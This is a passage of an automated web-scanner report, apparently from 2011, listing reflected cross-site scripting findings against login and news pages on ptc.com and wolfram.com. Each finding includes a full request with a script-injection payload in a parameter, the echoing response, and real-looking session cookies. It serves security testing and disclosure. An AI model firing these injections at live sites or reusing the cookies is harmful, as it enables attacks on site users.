Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:46 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:11 GMT;path=/;secure
Content-Length: 35366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
<input type="hidden" name="msg" value="11ee82"><script>alert(1)</script>212e8cc256d" />
...[SNIP]...

1.57. https://www.ptc.com/appserver/common/login/ssl/login.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/login/ssl/login.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254dc"><script>alert(1)</script>0846d0c8ba8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=1&254dc"><script>alert(1)</script>0846d0c8ba8=1 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:55 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=36
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:20 GMT;path=/;secure
Content-Length: 35407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com: Log In</titl
...[SNIP]...
<input type="hidden" name="254dc"><script>alert(1)</script>0846d0c8ba8" value="1" />
...[SNIP]...

1.58. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/login/ssl/login.jsp

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 8c97c<script>alert(1)</script>e6dbcc88380 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=4&uid=xss8c97c<script>alert(1)</script>e6dbcc88380 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Account%20Login%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DAccount%252520Login%252520Page%2526pidt%253D1%2526oid%253DLog%252520In%2526oidt%253D3%2526ot%253DSUBMIT; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:07 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=18
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:32 GMT;path=/;secure
Content-Length: 35547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com Account Not A
...[SNIP]...
<b>xss8c97c<script>alert(1)</script>e6dbcc88380</b>
...[SNIP]...

1.59. https://www.ptc.com/appserver/common/login/ssl/login.jsp [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ptc.com
Path:   /appserver/common/login/ssl/login.jsp

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4f7"><script>alert(1)</script>692868cf3d5 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/common/login/ssl/login.jsp?dest=%252Fappserver%252Fauth%252Fauthenticate.jsp%253Fdest%253Dhttp%253A%252F%252Fcommunities.ptc.com%252Fcommunity%252Fsearch.jspa%253FpeopleEnabled%253Dtrue%2526userID%253D%2526containerType%253D%2526container%253D%2526spotlight%253Dtrue%2526q%253Dxss%252Bbond%252Binterest%252Bfaq&msg=4&uid=xssec4f7"><script>alert(1)</script>692868cf3d5 HTTP/1.1
Host: www.ptc.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; JSESSIONID=2D0C96AD12D9D3C0D09DD30EDCDF94C0.hqjbsprd07-e; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Account%20Login%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DAccount%252520Login%252520Page%2526pidt%253D1%2526oid%253DLog%252520In%2526oidt%253D3%2526ot%253DSUBMIT; NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:06 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Set-Cookie: NSC_xxx-qspe-ttm-ejsfdu=ffffffff0f038a6445525d5f4f58455e445a4a42378b;expires=Mon, 03-Oct-2011 20:11:31 GMT;path=/;secure
Content-Length: 35551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PTC.com Account Not A
...[SNIP]...
<input type="hidden" name="uid" value="xssec4f7"><script>alert(1)</script>692868cf3d5" />
...[SNIP]...

1.60. http://www.wolfram.com/news/mathcad.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfram.com
Path:   /news/mathcad.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b9c"><script>alert(1)</script>c6d903096a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/mathcad.html?a9b9c"><script>alert(1)</script>c6d903096a9=1 HTTP/1.1
Host: www.wolfram.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:42 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 16:28:48 GMT
ETag: "9c4-48a45d40"
Content-Type: text/html
Content-Length: 29144

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Mathematica Imports Mathcad Documents</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<a href="/news/mathcad.html?a9b9c"><script>alert(1)</script>c6d903096a9=1;print_this_page=1" class="sblinkutil" target="_blank">
...[SNIP]...
